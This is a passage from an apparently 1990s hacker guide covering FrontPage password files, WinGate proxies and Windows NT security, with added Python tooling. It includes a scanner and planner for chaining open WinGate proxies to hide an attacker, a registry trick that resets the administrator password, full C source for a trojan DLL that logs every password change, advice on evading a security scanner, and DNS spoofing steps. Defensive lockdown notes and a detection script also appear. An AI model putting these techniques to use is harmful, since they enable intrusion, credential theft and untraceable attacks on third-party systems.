      [9.0.3] Side note on using John the Ripper
      Then run your favorite Unix password cracker, such as John the Ripper:
      Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]
      Flags: -pwfile:<file>[,..] specify passwd file(s) (wildcards allowed)
      -wordfile:<file> specify wordlist file
      -restore[:<file>] restore session [from <file>]
      -user:login|uid[,..] only crack this (these) user(s)
      -timeout:<time> abort session after a period of <time> minutes
      -incremental[:<mode>] incremental mode [using JOHN.INI entry <mode>]
      -single single crack mode
      -stdin read words from stdin
      -list list each word
      -test perform a benchmark
      -beep beep when a password is found
      -quiet do not beep when a password is found (default)
      -noname don't use memory for login names
      Other ways of obtaining service.pwd:
      http://ftpsearch.com/index.html
      search for service.pwd
      http://www.altavista.digital.com
      advanced search for link:"/_vti_pvt/service.pwd"
      To open a FrontPage web
      On the FrontPage Explorer’s File menu, choose Open FrontPage Web.
      In the Getting Started dialog box, select Open an Existing FrontPage
      Web and choose the FrontPage web you want to open.
      Click More Webs if the web you want to open is not listed.
      Click OK.
      If you are prompted for your author name and password, you will have to decrypt service.pwd, guess, or move on.
      Enter them in the Name and Password Required dialog box, and click OK.
      Alter the existing page, or upload a page of your own.
      [10.0.0] WinGate
      There have been a few papers about WinGate. Some have explained how to bounce through its port 23 telnet proxy; some have explained how to secure it. In this section we will show you how WinGate is used for good and for bad, and you will learn from both kinds of example. People in the past have said there are flaws and exploits in WinGate, and this is wrong: there are system admins who poorly configure their systems, but WinGate itself is not the flaw.
      [10.0.1] What Is WinGate?
      WinGate is basically a program that lets you split a connection, e.g. share one modem between two computers. WinGate comes with several proxies, and that is where the possible threat lies. (This sharing of an Internet connection is known as connection aggregation.)
      Note: We will only talk about 3 of the more used proxy portions of WinGate.
      [10.0.2] Defaults After Install
      When you do a regular install of WinGate without changing things there are a few defaults:
      Port: | Service:
      23 Telnet Proxy Server - This is default and running right after install.
      1080 SOCKS Server - This once setup via GateKeeper has no password until you set one.
      6667 IRC Mapping - This once setup via GateKeeper has no password until you set one.
      The biggest threat to your server is the port 23 telnet proxy.
      [10.0.3] Port 23 Telnet Proxy
      This proxy is set up and running as soon as you finish installing, and to make things worse it has no password after install and doesn't ask you for one. Most system admins don't even know this and don't think to password it, and that is where the problem arises.
      The telnet proxy is quite simple. You telnet to port 23 on the server running the WinGate telnet proxy and you get a WinGate> prompt. At that prompt you type the server, a space, and the port you want to connect to.
      Example:
      telnet wingate.net
      Connected to wingate.net
      WinGate> victim.com 23
      This example shows someone telnetting to the WinGate server and then telnetting out of it to victim.com, so victim.com's logs will show the WinGate's IP (wingate.net), and the person telnetting keeps her IP a secret.
      [10.0.4] Port 1080 SOCKS Proxy
      The SOCKS proxy is not installed by default, but as soon as you use GateKeeper to install it, it runs with no password unless you set one. If you are familiar with SOCKS you know there are many things you can do with it.
      [10.0.5] Port 6667 IRC Proxy
      The IRC proxy works like a WinGate telnet proxy bounce to an IRC server, except the IRC proxy is already set to go to a particular server. It is not running after install, but once you do install it, it is set up with no password unless you set one.
      [10.0.6] How Do I Find and Use a WinGate?
      Finding WinGates is relatively easy. If you would like to find static-IP WinGates (the IP never changes), go to Yahoo or a similar search engine and search for cable modems. The reason for searching for cable modems is that a lot of people with cable modems run WinGate so they can split the cable modem's large bandwidth and share it with the other computers in their house. One large cable modem company is Cox Cable; their web page can be found at www.home.com. The Cox Cable range of IPs is 24.1.X.X, where the value of X tells you where in the country the cable modem is located. You can also use port or domain scanners and scan for port 1080, which identifies a SOCKS proxy; this is also an easy way to find a WinGate.
      Example:
      24.1.67.1 resolves to c224084-a.frmt1.sfba.home.com, from which we know the abbreviation sfba = San Francisco Bay Area, or something close to that.
      That is how to find static-IP WinGates. Finding dynamic-IP WinGates (IPs that change every time a user logs on to the Internet) is not too hard either. Almost every ISP, big and small, has users running WinGate. You need to either know the format of an ISP's dynamic PPP addresses or get on IRC (Internet Relay Chat) and see what they are that way. Say you already have a PPP hostname of armory-us832.javanet.com. Resolve it and you get 209.94.151.143; now take that address and feed it to a domain scanner program, e.g. Domscan, which can be found on the Rhino9 web site (rhino9.abyss.com). Run Domscan; there is a box where you put in the IP address and another for the port to scan for. The WinGate telnet proxy by default runs on port 23, so we put 209.94.151.143 in the first box and 23 in the second, then click Start. The results we get are:
      209.94.151.2
      209.94.151.4
      209.94.151.6
      209.94.151.10
      209.94.151.8
      209.94.151.73
      209.94.151.118
      209.94.151.132
      Now we have to check each of these IPs for the WinGate prompt. To do that we telnet to 209.94.151.2 on port 23, and if it shows WinGate> right when we connect, then it is a WinGate. If not, we go to the next address, which in this case would be 209.94.151.4, and so on through the whole list.
      Note: when scanning for dynamic-IP WinGates it is more common that the last octet of the WinGate's IP will be higher. E.g. there is a better chance that 209.94.151.132 is a WinGate than 209.94.151.2.
      [10.0.7] I have found a WinGate telnet proxy, now what?
      Well, there are many uses for WinGate. The first, and probably the greatest, is the WinGate bounce technique. Say you are going to hack the Pentagon. You can use the WinGate technique to keep yourself out of a jail cell with Spike. Here is how it works. We get a collection of WinGate IPs. First we open our telnet program and telnet to the first WinGate on our list. We get the WinGate> prompt, and at that prompt we type the second WinGate on our list, a space, then 23, and hit enter. We get another WinGate> prompt, and at that prompt we type the third WinGate IP on our list, a space, 23, enter, and so on and so forth until we have bounced through about 10 WinGates. On the tenth WinGate we enter the Pentagon address, e.g. WinGate> www.pentagon-ai.army.gov 23, hit enter, and start hacking away at it.

      So you ask, can't they just trace back through all the WinGates? They could try, and here is how it would work. The Pentagon has an IP in its logs, say 2.2.2.2. The Pentagon learns that IP belongs to an Internet service provider called Interlink, so it calls Interlink and tells them that at 3:43am on Sunday the address 2.2.2.2 hacked into its computer system. The ISP checks its logs and sees that its user John Doe was on at that time with that IP on Sunday. So the Pentagon has the SWAT team raid John Doe's house, and they find nothing. It could end right there, or the Pentagon might notice that John Doe has WinGate and check his logs. Most people with WinGate don't even log, so the Pentagon could be stumped right there again; or they might see that another IP went through that WinGate, and then they have to call the next ISP and repeat the whole process.

      Now if we went through 10 WinGate IPs, you can bet that somewhere in that chain either the ISP or the WinGate user won't know what IP was going through them. In other words, if you bounce through 10 WinGates you are a ghost, thy samurai... That is one use of WinGate's telnet proxy. Note: you might need to press Control+Enter at the WinGate> prompt; it differs between telnet clients.

      Another use is IRC spoofing. To do this we take a WinGate IP and connect our IRC client to it. This is how it would look in mIRC for Windows. Enter these commands:
      1. /server wingate.net
      It then connects.
      2. /quote irc.irc.net 6667
      It then connects to the irc server.
      3. /quote user whatever whatever whatever@server.com whatever
      4. /quote nick whatever
      This sends the irc client info. Read the irc rfc for more info on that.
      Once we have done /quote nick whatever, mIRC will be fully connected and we can do whatever we want; our IP on IRC will be wingate.net, or whatever the WinGate's IP is. So think about it and I am sure you can think of a few fun things to do with someone else's IP. Note: for those of you who choose to abuse this, I have already coded an anti-WinGate script for IRC to detect you mean people who choose to abuse this.
      Those are 2 of the more common things to do with WinGate telnet proxies.
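The port-23 sweep, the prompt check and the hop-by-hop bounce described above can all be scripted. This Python script is an added example by the editor, not WinGate's or Rhino9's tooling and not from the original text: read_banner does the real connect-and-read, is_wingate checks for the WinGate> prompt, find_wingates applies that to a list of hosts from a port scan, and bounce_chain produces the exact line to type at each prompt for a chain of WinGates plus the address the final target will log. The probe function is injectable so the logic can be exercised offline with constructed banners; the hostnames in the usage block are placeholders.

```python
import socket
from typing import Callable, Iterable, List, Optional

WINGATE_PROMPT = b"WinGate>"

# A probe takes a host and returns the first bytes the service sent, or None if
# the connection failed. read_banner is the real one; tests substitute a fake.
Probe = Callable[[str], Optional[bytes]]


def read_banner(host: str, port: int = 23, timeout: float = 3.0, limit: int = 256) -> Optional[bytes]:
    """Connect to host:port and read whatever greets us (real network I/O)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            data = b""
            while len(data) < limit and WINGATE_PROMPT not in data:
                chunk = sock.recv(128)
                if not chunk:
                    break
                data += chunk
            return data
    except OSError:  # refused, timed out, unreachable: not a WinGate we can use
        return None


def is_wingate(banner: Optional[bytes]) -> bool:
    """The signature the text relies on is the WinGate> prompt sent on connect.
    Telnet option negotiation (0xFF 0xFB ...) may precede it, so search, don't compare."""
    return banner is not None and WINGATE_PROMPT in banner


def find_wingates(hosts: Iterable[str], probe: Probe = read_banner) -> List[str]:
    """Check each host from a port-23 sweep for the prompt, as the text does by hand."""
    return [host for host in hosts if is_wingate(probe(host))]


def bounce_chain(wingates: List[str], target: str, port: int = 23) -> dict:
    """Plan a bounce: telnet to the first WinGate, then type one 'host port' line per
    prompt. Every hop but the last goes to the next WinGate's telnet proxy (port 23);
    the last goes to the real target. seen_by_target is what the target's log records."""
    if not wingates:
        raise ValueError("need at least one WinGate to bounce through")
    commands = [f"{w} 23" for w in wingates[1:]] + [f"{target} {port}"]
    return {"entry": wingates[0], "commands": commands, "seen_by_target": wingates[-1]}


if __name__ == "__main__":
    # Placeholder hosts (TEST-NET-3); replace with the addresses your port scan returned.
    candidates = ["203.0.113.2", "203.0.113.4", "203.0.113.132"]
    found = find_wingates(candidates)  # real probes, up to 3 s each
    print("WinGates:", found)
    if found:
        plan = bounce_chain(found, "victim.example", 23)
        print("telnet", plan["entry"])
        for line in plan["commands"]:
            print("WinGate>", line)
        print("target will log:", plan["seen_by_target"])
```

The same is_wingate test is what the mIRC detection script below applies from the other side: it opens a connection to each joiner's address on port 23 and looks for the prompt.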
      [10.0.8] Securing the Proxies
      Services that need to be locked to stop bouncing:
      23 - Telnet Proxy Server
      1080 - SOCKS Server
      6667 - IRC Mapping
      All ports can be locked the same way:
      1- Load GateKeeper
      2- Log on to the WinGate server as Administrator
      3- Select the service to lock
      4- Right-click and pick Properties
      5- One way to lock it down is to click "Bind to specific interface" and put 127.0.0.1 in the box, so the service only answers the WinGate machine itself
      6- The other way is to select Policies, double-click "Everyone Unrestricted Rights", click the Location tab, click "Specify locations from where this recipient has rights", and enter the IP(s) you want to give access to this service (add 127.0.0.1 so the local box keeps access). You can add individual IPs or groups of IPs such as 199.170.0.*
      Some other notes: the Guest account has no password and is enabled on install. A basic install lets EVERYONE bounce from your system: all ports but the "remote control service" are unlocked and everyone has access. Turn off any service you do not need by double-clicking the service and unchecking "Accept connections on port".
      [10.0.9] mIRC 5.x WinGate Detection Script
      Note: This script will kick/ban anyone found to be connecting through a WinGate telnet proxy. On each join to a protected channel it resolves the nick's address, opens a DCC CHAT to that address on port 23 (mIRC's stand-in for telnet), and kicks if the WinGate> prompt comes back. %protchans must already be set to the channel(s) to protect; the script uses it but does not set it.
      ; telnet <ip> <port>: open a DCC CHAT to an arbitrary address and port
      alias telnet .msg $me $chr(1) $+ DCC CHAT CHAT $longip($$1) $$2 $+ $chr(1)
      ; clear the last-joined marker used by the gateslip check
      alias removenickcheck unset %lastjoined $nick
      ; deop, ban and kick the nick from every channel we share with it
      alias gatekick {
        set %nick $$1
        set %chan 0
        :loop2
        inc %chan 1
        if (%nick ison $chan(%chan)) {
          mode $chan(%chan) -o %nick
          ban $chan(%chan) %nick 2
          kick $chan(%chan) %nick -=_Wingate Spoof_=-
          goto loop2
        }
        if ($chan(%chan) == $null) { goto end2 }
        goto loop2
        :end2
        unset %nick
      }
      #spoofcheck on
      ; on join to a protected channel: remember the nick, log nick and address, then resolve it
      on 1:JOIN:%protchans:set %gatenick $nick | set %lastjoined $nick | timer 1 3 removenickcheck | write $mircdirips.txt %gatenick --> $site <-- [ $time, $date ] | dns $nick
      ; when the DNS answer arrives, probe port 23 and close the chat after 15 seconds
      on 1:DNS:echo -a _DNS ON [ $+ $nick $+ ]] | echo -a _IP address: $iaddress | echo -a _Name address: $naddress | set %gateip $iaddress | set %gatename $naddress | telnet %gateip 23 | timer66 1 15 close -c
      on 1:CHATOPEN:msg =$nick gatecheck | timer66 1 15 close -c
      ; a WinGate> prompt (or a reply matching *many*) means a proxy answered: kick and record it
      on 1:CHAT:*WinGate>*:gatekick %gatenick | write $mircdirgate.txt %gatename = %gateip
      on 1:CHAT:*many*:gatekick %gatenick | write $mircdirgate.txt %gatename = %gateip
      #spoofcheck end
      #gateslip on
      ; a nick change within 3 seconds of joining is treated as a proxy user dodging the check
      on 1:NICK:{
        if ($nick == %lastjoined) && ($nick != $me) {
          echo 4 -a (-=_GateSlip Check_=-)
          kick %protchans $newnick -=_GateSlip_=-
          removenickcheck
        }
      }
      #gateslip end
      [10.1.0] Conclusion
      WinGate is just another example of a program that is good but doesn't warn the system admins, and as we all know the common system admin doesn't read much; he just installs, thinking it is secure. Software programmers need to either make their programs default to tight security or at least, as the program is installed, warn the system admin of possible misconfigurations. Whether it is Microsoft products or this simple WinGate, remember one thing: the software developer makes the software work; they rarely ever warn you about misconfigurations. Yes, people do put out patches for true exploits, but where are the papers on misconfigurations? Where are the warnings about things you might do that you shouldn't? If I were one of the WinGate programmers I would prompt the user while WinGate is installing and tell them of the different security risks they may face. We hope that this paper has helped and that we, Rhino9, have helped.
      [11.0.0] What a security person should know about WinNT
      The basis for this portion of the book was gleaned from Simple Nomad's FAQ; much props to him.
      [11.0.1] NT Network structures (Standalone/WorkGroups/Domains)
      Each NT workstation participates in either a workgroup or a domain. Most companies will have NT workstations participate in a domain for management of the resource by the administrator.
      A domain is one or more servers running NT server with all of the servers functioning as a single system. The domain not only contains servers, but NT workstations, Windows for Workgroups machines, and even LAN Manager 2.x machines. The user and group database covers ALL of the resources of a domain.
      Domains can be linked together via trusted domains. The advantage of trusted domains is that a user only needs one user account and password to get to resources across multiple domains, and administrators can centrally manage the resources.
      A workgroup is simply a grouping of workstations that do not belong to a domain. A standalone NT workstation is a special case workgroup.
      User and group accounts are handled differently between domain and workgroup situations. User accounts can be defined on a local or domain level. A local user account can only logon to that local computer, while a domain account can logon from any workstation in the domain.
      Global group accounts are defined at a domain level. A global group account is an easy way to grant access to a subset of users in a domain to, say, a single directory or file located on a particular server within the domain. Local group accounts are defined on each computer. A local group account can have global group accounts and user accounts as members.
      In a domain, the user and group database is "shared" by the servers. NT workstations in the domain DO NOT have a copy of the user and group database, but can access the database. In a workgroup, each computer in the workgroup has its own database, and does not share this information.
      [11.0.2] How does the authentication of a user actually work?
      First, a user logs on. When this happens, NT creates a token object that represents that user. Each process the user runs is associated with this token (or a copy of it). The token-process combination is referred to as a subject. As subjects access objects such as files and directories, NT checks the subject's token against the Access Control List (ACL) of the object and determines whether to allow the access or not. This may also generate an audit message.
      [11.0.3] A word on NT Challenge and Response
      When a user logs on, more than likely they will be using Windows NT Challenge and Response. When using this type of password encryption, the password never actually crosses the wire. A null or random set of characters is generated at the client machine. Those characters are encrypted using the user's password. That encrypted information is then sent across the wire. The server then uses what it has stored in its database as the user's password to decrypt the sent data. If the decryption works, it knows that the user typed in the correct password client-side.
      [11.0.4] Default NT user groups
      There are a number of built-in local groups in NT that can do various functions, some which would be better off being left to the Administrator. Administrators can do everything, but the following groups' members can do a few extra items (I only verified this on 4.0):
      - Server Operators: do a shutdown, even remotely; reset the system time; perform backups and restores.
      - Backup Operators: do a shutdown; perform backups and restores.
      - Account Operators: do a shutdown.
      - Print Operators: do a shutdown.
      Also, members of these groups can log in at the console. As you explore this book and possibly someone else's server, remember these permissions. Gaining a Server Operator account and placing a trojan that activates after a remote shutdown could get you Administrator.
      [11.0.5] Default directory permissions
      I only verified these on 4.0. And remember, Administrators are deities. Otherwise, if it isn't here, the group doesn't have access.
      \ (root), \SYSTEM32, \WIN32APP - Server Operators and Everyone can read and execute files, display permissions on files, and do some changing on file attributes.
      \SYSTEM32\CONFIG - Everyone can list filenames in this directory.
      \SYSTEM32\DRIVERS, \SYSTEM\REPL - Server Operators have full access, Everyone has read access.
      \SYSTEM32\SPOOL - Server Operators and Print Operators have full access, Everyone has read access.
      \SYSTEM32\REPL\EXPORT - Server Operators can read and execute files, display permissions on files, and do some changing on file attributes. Replicator has read access.
      \SYSTEM32\REPL\IMPORT - Server Operators and Replicator can read and execute files, display permissions on files, and do some changing on file attributes. Everyone has read access.
      \USERS - Account Operators can read, write, delete, and execute. Everyone can list filenames in this directory.
      \USERS\DEFAULT - Everyone has read, write, and execute.
      [11.0.6] Common NT accounts and passwords
      There are two accounts that come with NT out of the box – administrator and guest. In a network environment, I have run into local administrator access unpassworded, since the Sys Admin thought that global accounts ruled over local ones. Therefore it is possible to gain initial access to an NT box by using its local administrator account with no password.
      Guest is another common unpassworded account, although recent shipments of NT disable the account by default. While it is possible that some companies will delete the guest account, some applications require it. If Microsoft Internet Studio needs to access data on another system, it will use guest for that remote access.
      [11.0.7] How do I get the admin account name?
      It is possible that a Sys Admin will create a new account, give that account the same access as an administrator, and then remove part of the access to the administrator account. The idea here is that if you don't know the administrator account name, you can't get in as an administrator.
      Typing "NBTSTAT -A ipaddress" will give you the new administrator account (generally tagged as a 2 digit 03 code), assuming they are logged in. A bit of social engineering could get them to log in as well. nbtstat will also give you other useful information such as services running, the NT domain name, the nodename, and the ethernet hardware address.
      [11.0.8] Accessing the password file in NT
      The location of what you need is \\WINNT\SYSTEM32\CONFIG\SAM, which is the location of the security database. This is usually world readable by default, but locked since it is in use by system components. It is possible that there are SAM.SAV files which could be readable. If so, these could be obtained for the purpose of getting password info.
      During the installation of NT a copy of the password database is put in \\WINNT\REPAIR. Since it was just installed, only the Administrator and Guest accounts will be there, but maybe Administrator is enough -- especially if the Administrator password is not changed after installation.
      If the Sys Admin updates their repair disks, or you get a hold of a copy of the repair disks, you can get password database.
      If you are insane, you can go poking around in the SAM secret keys. First, configure the Schedule service to log on as LocalSystem and allow it to interact with the desktop, and then schedule an interactive regedt32 session. The regedt32 session will be running as LocalSystem and you can play around in the secret keys. However, if you change some stuff this might be very bad. You have to be Administrator to do this, though, so for the hacker you need to walk up to the machine while the Administrator is logged in and distract them by telling them they're giving away Microsoft t-shirts in the lobby (this doesn't always work ;-).
      [11.0.9] Cracking the NT passwords
      First off, it should be explained that the passwords are technically not located on the server, or in the password database. What IS located there is a one-way hash of the password. Let me explain...
      Two one-way hashes are stored on the server -- a Lan Manager password, and a Windows NT password. Lan Manager uses a 14 byte password. If the password is less than 14 bytes, it is padded with 0's. It is converted to upper case, and split into 7 byte halves. An 8 byte odd parity DES key is constructed from each 7 byte half. Each 8 byte DES key is encrypted with a "magic number" (0x4B47532140232425 encrypted with a key of all 1's). The results of the magic number encryption are concatenated into a 16 byte one way hash value. This value is the Lan Manager "password".
      A regular Windows NT password is derived by converting the user's password to Unicode, and using MD4 to get a 16 byte value. This hash value is the NT "password".
      So to crack NT passwords, the username and the corresponding one way hashes (Lan Man and NT) need to be extracted from the password database. Instead of going out and writing some code to do this, simply get a copy of Jeremy Allison's PWDUMP, which goes through SAM and gets the information for you.
      PWDUMP does require that you are an Administrator to get stuff out of the registry, but if you can get ahold of copies of the security database from another location you can use those. For actually cracking the password, I recommend using L0phtcrack.
      [11.1.0] What is ‘last login time’?
      Let's say an admin is checking the last time certain users have logged in by doing a NET USER <userid> /DOMAIN. Is the info accurate? Most of the time it will NOT be.
      Most users do not login directly to the Primary Domain Controller (PDC), they login to a Backup Domain Controller (BDC). BDCs do NOT contain readonly versions of SAM, they contain read-write versions. To keep the already ungodly amount of network traffic down, BDCs do not tell the PDC that they have an update of the last login time until a password change has been done. And the NET USER <userid> /DOMAIN command checks the PDC, so last login time returned from this command could be wildly off (it could even show NEVER).
      As a hacker, if you happen to know that password aging is not enforced, then you can bet that last login times will probably not be very accurate.
      [11.1.1] I've got Guest access, can I try for Admin?
      Basic NT 3.51 has some stuff read/writeable by default. You could edit the association between an application and the data file extension using regedt32. First off, you should write a Win32 app that does nothing but the following -
      net user administrator biteme /y
      notepad %1 %2 %3 %4 %5
      In a share you have read/write access to, upload it. Now change the association between .txt files and notepad to point to the location of the uploaded file, like
      \\ThisWorkstation\RWShare\badboy.exe.
      Now wait for the administrator to launch a text file by double clicking on it, and the password becomes "biteme".
      Of course, if the Sys Admin is smart they will have removed write permission from Everyone for HKEY_CLASSES_ROOT, only giving out full access to creator\owner.
      [11.1.2] I heard that the %systemroot%\system32 was writeable?
      Well, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL in that directory. This file typically exists in a Netware environment. First compile this exploit code written by Jeremy Allison (jra@cygnus.com) and call the resulting file FPNWCLNT.DLL. Now wait for the user names and passwords to get written to a file in \temp.
      ------------- cut --------------
      #include <windows.h>
      #include <stdio.h>
      #include <stdlib.h>
      struct UNI_STRING {
      USHORT len;
      USHORT maxlen;
      WCHAR *buff;
      };
      static HANDLE fh;
      BOOLEAN __stdcall InitializeChangeNotify ()
      {
      DWORD wrote;
      fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE,
      FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
      FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
      0);
      WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
      return TRUE;
      }
      LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,
      struct UNI_STRING *passwd)
      {
      DWORD wrote;
      WCHAR wbuf[200];
      char buf[512];
      char buf1[200];
      DWORD len;
      memcpy(wbuf, user->buff, user->len);
      len = user->len/sizeof(WCHAR);
      wbuf[len] = 0;
      wcstombs(buf1, wbuf, 199);
      sprintf(buf, "User = %s : ", buf1);
      WriteFile(fh, buf, strlen(buf), &wrote, 0);
      memcpy(wbuf, passwd->buff, passwd->len);
      len = passwd->len/sizeof(WCHAR);
      wbuf[len] = 0;
      wcstombs(buf1, wbuf, 199);
      sprintf(buf, "Password = %s : ", buf1);
      WriteFile(fh, buf, strlen(buf), &wrote, 0);
      sprintf(buf, "RID = %x\n", rid);
      WriteFile(fh, buf, strlen(buf), &wrote, 0);
      return 0L;
      }
      ------------- cut --------------
      If you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to reboot the server after placing the trojan in %systemroot%\system32.
      ISS (www.iss.net) has a security scanner for NT which will detect the trojan DLL, so you may wish to consider adding in extra junk to the above code to make the size of the compiled DLL match what the original was. This will prevent the current shipping version of ISS's NT scanner from picking up the trojan.
      It should be noted that by default the group Everyone has default permissions of "Change" in %systemroot%\system32, so any DLL that is not in use by the system could be replaced with a trojan DLL that does something else.
      [11.1.3] What about spoofing DNS against NT?
      By forging UDP packets, NT name server caches can be compromised. If recursion is allowed on the name server, you can do some nasty things. Recursion is when a server receives a name server lookup request for a zone or domain which it does not serve. This is typically how most DNS setups are done.
      So how do we do it? We will use the following example:
      We are root on ns.nmrc.org, IP 10.10.10.1. We have pirate.nmrc.org with an address of 10.10.10.2, and bait.nmrc.org with an address of 10.10.10.3. Our mission? Make the users at lame.com access pirate.nmrc.org when they try to access www.lamer.net.
      Okay, assume automation is at work here to make the attack smoother...
      - DNS query is sent to ns.lame.com asking for address of bait.nmrc.org.
      - ns.lame.com asks ns.nmrc.org what the address is.
      - The request is sniffed, and the query ID number is obtained from the request packet.
      - DNS query is sent to ns.lame.com asking for the address of www.lamer.net.
      - Since we know the previous query ID number, chances are the next query ID number will be close to that number.
      - We send spoofed DNS replies with several different query ID numbers. These replies are spoofed to appear to come from ns.lamer.net, and state that its address is 10.10.10.2.
      - pirate.nmrc.org is set up to look like www.lamer.net, except maybe it has a notice to "go to the new password page and set up an account and ID".
      Odds are this new password is used by that lame.com user somewhere else...
      With a little creativity, you can also do other exciting things like reroute (and make copies of) email, denial of service (tell lame.com that www.lamer.net doesn't exist anymore), and other fun things.
      Supposedly Service Pack 3 fixes this.
      [11.1.4] What about default shared folders?
      The main thing to realize about shares is that there are a few that are invisible. Administrative shares are default accounts that cannot be removed. They have a $ at the end of their name. For example C$ is the administrative share for the C: partition, D$ is the administrative share for the D: partition. WINNT$ is the root directory of the system files.
      By default, since logging is not enabled on failed attempts and the administrator doesn't get locked out from false attempts, you can try and try different passwords for the administrator account. You could also try a dictionary attack. Once in, you can get at basically anything.
      [11.1.5] How do I get around a packet filter-based firewall?
      If the target NT box is behind a firewall that is doing packet filtering (which is not considered firewalling by many folks) and it does not have SP3 loaded it is possible to send it packets anyway. This involves sending decoy IP packet fragments with specially crafted headers that will be "reused" by the malicious IP packet fragments. This is due to a problem with the way NT's TCP/IP stack handles reassembling fragmented packets. As odd as this sounds, example code exists to prove it works. See the web page at http://www.dataprotect.com/ntfrag for details.
      How does it bypass the packet filter? Typically packet filtering only drops the fragmented packet with the offset of zero in the header. The example source forges the headers to get around this, and NT happily reassembles what does arrive.
      [11.1.6] What is NTFS?
      NTFS is the Windows NT special file system. This file system is tightly integrated into Windows security -- it is what allows access levels to be set from the directory down to individual files within a directory.
      [11.1.7] Are there any vulnerabilities to NTFS and access controls?
      Not so much vulnerabilities as there are quirks -- quirks that can be exploited to a certain degree.
      For example, let's say the system admin has built a home directory for you on the server, but has disallowed the construction of directories or files that you wish to make available to the group Everyone. You are wanting to make this special directory so that you can easily retrieve some hack tools but you are cut off. However, if the sys admin left you as the owner of the home directory, you can go in and alter its permissions. This is because as long as you are the owner or Administrator you still control the file. Oh sure, you may get a few complaints from the system when you are doing it, but it can be done.
      Since NTFS has security integrated into it, there are not too many ways around it. The main one requires access to the physical system. Boot up the system on a DOS diskette, and use NTFSDOS.EXE. It will allow you to access an NTFS volume bypassing security.
      The last quirk is that if you have a directory with Full Control instead of RWXDPO permissions, then you get a hidden permission called File Delete Child. FDC cannot be removed. This means that all members of the group Everyone can delete any read-only file in the directory. Depending on what the directory contains, a hacker can replace a file with a trojan.
      [11.1.8] How is file and directory security enforced?
      Since files and directories are considered objects (same as services), the security is managed at an "object" level.
      An access-control list (ACL) contains information that controls access to an object or controls auditing of attempts to access an object. It begins with a header that contains information pertaining to the entire ACL, including the revision level, the size of the ACL, and the number of access-control entries (ACEs) in the list.
      After the header is a list of ACEs. Each ACE specifies a trustee, a set of access rights, and flags that dictate whether the access rights are allowed, denied, or audited for the trustee. A trustee can be a user account, group account, or a logon account for a service program.
      A security descriptor can contain two types of ACLs: a discretionary ACL (DACL) and a system ACL (SACL).
      In a DACL, each ACE specifies the types of access that are allowed or denied for a specified trustee. An object's owner controls the information in the object's DACL. For example, the owner of a file can use a DACL to control which users can have access to the file, and which users are denied access.
      If the security descriptor for an object does not have a DACL, the object is not protected and the system allows all attempts to access the object. However, if an object has a DACL that contains no ACEs, the DACL does not grant any access rights. In this case, the system denies all attempts to access the object.
      In a SACL, each ACE specifies the types of access attempts by a specified trustee that cause the system to generate audit records in the system event log. A system administrator controls the information in the object's SACL. An ACE in a SACL can generate audit records when an access attempt fails, when it succeeds, or both.
      To keep track of the individual object, a Security Identifier (SID) uniquely identifies a user or a group.
      A SID contains:
      - User and group security descriptors
      - 48-bit ID authority
      - Revision level
      - Variable subauthority values
      A privilege is used to control access to a service or object more strictly than is normal with discretionary access control. Privileges provide access to services rarely needed by most users. For example, one type of privilege might give access for backups and restorals, another might allow the system time to be changed.
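As an added example (not part of the Rhino9 text), a simplified Python model of the discretionary access check described above, covering the two edge cases the text calls out (no DACL at all versus a DACL with no ACEs), the implicit rights an owner keeps (which is how the home-directory quirk in [11.1.7] works), and why the order of deny and allow ACEs matters. The access-right bits, the user SID and the sample descriptors are constructed; S-1-1-0 and S-1-5-32-544 are the real well-known SIDs for Everyone and Administrators.

```python
from dataclasses import dataclass
from typing import List, Optional

# Access-right bits for the model (constructed; the real ACCESS_MASK layout is
# not needed for the semantics shown here).
READ, WRITE, DELETE = 0x1, 0x2, 0x4
READ_CONTROL, WRITE_DAC = 0x8, 0x10   # read / change the object's security

EVERYONE = "S-1-1-0"                  # well-known SID: Everyone
ADMINS = "S-1-5-32-544"               # well-known SID: Administrators
ALICE = "S-1-5-21-EXAMPLE-1001"       # placeholder user SID (constructed)


@dataclass
class ACE:
    trustee: str            # SID the entry applies to (user, group, service)
    rights: int             # access mask allowed or denied
    deny: bool = False


@dataclass
class SecurityDescriptor:
    owner: str
    dacl: Optional[List[ACE]]   # None: no DACL at all; []: a DACL with no ACEs


def access_check(sd: SecurityDescriptor, token_sids: set, desired: int) -> bool:
    """True if a token holding token_sids is granted every bit of desired.

    Rules modelled (simplified from the real NT check):
      * the owner is always granted READ_CONTROL and WRITE_DAC, which is why an
        owner can re-permission a directory an admin tried to lock down;
      * no DACL at all means the object is unprotected: everything is allowed;
      * a DACL with no ACEs grants nothing: everything else is denied;
      * ACEs are scanned in order; a deny ACE covering any right not yet
        granted ends the check, an allow ACE removes its rights from the
        outstanding set; the check succeeds once nothing is outstanding.
    """
    remaining = desired
    if sd.owner in token_sids:
        remaining &= ~(READ_CONTROL | WRITE_DAC)
    if remaining == 0 or sd.dacl is None:
        return True
    for ace in sd.dacl:
        if ace.trustee not in token_sids:
            continue
        if ace.deny:
            if ace.rights & remaining:
                return False
        else:
            remaining &= ~ace.rights
            if remaining == 0:
                return True
    return False


# Sample descriptors (constructed). HOME_DIR_CANONICAL lists the explicit deny
# for ALICE before the broad allow for Everyone; HOME_DIR_MISORDERED has the
# same two ACEs the other way round, so the deny is never reached.
HOME_DIR_CANONICAL = SecurityDescriptor(owner=ADMINS, dacl=[
    ACE(ALICE, WRITE | DELETE, deny=True),
    ACE(EVERYONE, READ | WRITE | DELETE),
])
HOME_DIR_MISORDERED = SecurityDescriptor(owner=ADMINS, dacl=[
    ACE(EVERYONE, READ | WRITE | DELETE),
    ACE(ALICE, WRITE | DELETE, deny=True),
])
UNPROTECTED = SecurityDescriptor(owner=ADMINS, dacl=None)   # no DACL
LOCKED_BUT_OWNED = SecurityDescriptor(owner=ALICE, dacl=[])  # empty DACL


if __name__ == "__main__":
    alice = {ALICE, EVERYONE}
    print("canonical,  ALICE write    :", access_check(HOME_DIR_CANONICAL, alice, WRITE))
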